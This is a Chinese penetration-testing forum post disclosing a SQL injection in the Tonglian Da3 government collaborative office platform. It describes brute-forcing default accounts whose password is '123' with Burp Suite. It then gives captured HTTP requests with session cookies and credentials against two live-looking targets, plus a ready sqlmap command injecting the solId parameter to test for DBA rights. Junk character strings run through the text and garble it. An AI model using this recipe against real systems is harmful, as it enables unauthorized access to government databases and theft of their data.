中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin 时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

3 H% ^# @3 c; v
: {. P% X' s# j2 f6 M7 K

! l0 K; N" f+ R6 X6 t 平台简介： / P$ m- b0 n% J* Q! y4 G8 v+ F

# |$ i7 x& ^4 w3 O3 c: i0 h + P3 l6 Q8 r# Q1 e

9 `) _: v- F4 e( \* y9 h) [; P 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 z6 I, C; d3 N& U& Q5 q 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
5 N, h% p9 N z 同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！0 }( H' E7 ~' B4 Y5 `! ^; ?

/ F" [! z# b+ Q& M" P5 P0 T# R : s$ |8 l5 A1 A" P2 \: I

1 t9 n/ e& O$ _3 G$ \3 K 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址：* j5 }' t7 |6 D7 W( z

6 H& x& ]1 R0 X: F& C ; a+ N5 X* T% ]3 ^4 l0 S

. P3 U9 r' [) |5 p, M9 T4 ]$ h2 c9 s http://1.1.1.1:7197/cap-aco/#（案例2-）$ x2 P! l+ U# L3 \1 o

! P7 v9 q/ c. Z/ n: M4 D http://www.XXOO.com （案例1-官网网站）4 q* y, S, ]# Y& L) _

' V- }9 ^/ i) z; E. K8 `' m 7 e/ e; w4 o- D0 A9 J

! G* }5 \. `$ ~1 M& L 漏洞详情: 7 L% Y$ U& `) ? ?5 [* h6 x0 d

: }7 g( i1 u" Z6 ]* z 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试: ?8 h @$ \# k. g

4 i. G: `; H- g$ d: V8 _; Z 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图：1 h" g6 h% o. D8 R; `4 `

% H" l4 c+ b( [ q; }8 ^( _3 z. a4 P) G 8 @) ]; G9 \8 w2 e( k, J

- r+ u" v- S8 R+ B8 }$ @' R0 x# Q % r# x% n/ ^: w: s1 _0 L

5 D. K* A- |- ]' w% i+ X. k status为302即表示破解成功，然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包，抓包的数据分别如下： * \, V, e! Y2 ?8 h0 Y& v

% ~) M ?, i8 f' O5 N 1、案例1-官方网站7 O! I, d+ r# p

9 _+ D- ]9 u$ x' F$ s3 A: }9 g' K GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1- Z. c8 ?) e/ K9 V

$ \1 c) E! B- i Host: www.XXOO.com# K5 X! O5 c. O

# Q/ g% d0 A# H& V Proxy-Connection: Keep-Alive d7 f2 R# R/ X. ]- j9 ]+ M

$ e6 v$ ~# T# x+ |, F( T5 V# ] O Accept: application/json, text/javascript, */*; q=0.012 ~3 [4 b* r s$ f- _$ |

3 }: F: |6 S& b8 v! }( O+ p Accept-Language: zh-CN; l- m/ L% C* J7 c

1 ^! Q/ C# C ?& i/ c) ~% x Content-Type: application/json " ?' l4 A: e1 Y' P

: g' s5 i. c( o7 t User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 3 k! T7 S1 x' _

" b# o+ M$ @7 N$ p X-Requested-With: XMLHttpRequest- t8 S' T( g; }3 i

/ Z( V5 _, A! ]2 D" z- u Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002, P \* g6 u9 w7 m. C

$ ` s% Z0 T& {3 i2 F Accept-Encoding: gzip, deflate, sdch 8 u; {* h0 K; @ g

3 ?, a4 y% W2 X Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e7 d+ f$ T" Y# A. D+ E

0 }: s9 X" f( d+ N ], Q6 \ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: # V0 d6 h" ]% _& J" p8 ]7 x

0 ?& m/ e6 S F2 k O' n5 W2 B! W' r3 L( ^- Z& z

& F2 N. G0 w4 }* f( O2 d" T L) Q! h 7 l$ Z. C0 _% J: V0 s6 l1 ?& m) G

4 W. D& k( L4 `7 P2 ^+ k " A. ?! ]$ d8 Q2 O1 L

) ] a! V% f$ \+ c / E1 S& L" d5 h: B+ u% I

( a' s, p, @& F0 N( z4 ~8 k 9 d' \5 c0 w; [

$ o: Q& `- h5 Z) Z2 W. E 2、案例2-某天河云平台 ! n: L' M; U# k1 t i" _

1 Z1 O5 ]. ]( p8 @5 P0 d- u GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1& w$ I0 T+ a. K4 U

3 k4 _8 u2 \0 X- b9 H; E6 S Host: 1.1.1.:7197 + i4 v$ x" x) z1 A5 Y+ s( a

1 p$ q0 F# a+ C/ b. d* C$ C Accept: application/json, text/javascript, */*; q=0.018 J# i$ n% E5 E" { O$ f" ^3 v' {2 D3 X

5 m3 i4 O4 Z4 `' m6 N i X-Requested-With: XMLHttpRequest ; b. j$ U( o6 ~. w/ J

& Q1 C0 V- ~3 Y$ ]4 j User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 % p! W7 P3 t2 P5 |

, ?4 q0 G# j z7 u Content-Type: application/json 3 z3 k8 z! |1 P" R2 b4 N1 E

# t. j# p- [$ }+ z Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008) A# M* l5 a7 c0 q( C5 `% }1 v2 |

@) c- ]) R) q+ t! @3 H Accept-Language: zh-CN,zh;q=0.8 S) G+ ^& a* B2 q$ @

. n; {$ \$ g: H4 M5 h' e4 o Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1; C, e' Z( W' P9 d8 t$ m: y

0 b6 D' I2 ]# {0 B& {- y: } Connection: close & i1 `7 {' A$ [) c

' V* _9 K2 f$ y* q 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: ' i9 c2 H8 M; F$ ?. J. M8 u

! I X0 H0 l5 W2 t4 g) b! h4 z% j, s+ O5 A ) Q7 _; V2 f5 g; {6 {

1 s& o+ F# h' ~$ W( S* u u7 ?
1 `2 }' r* ]+ Z" v- V/ o+ K9 {

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)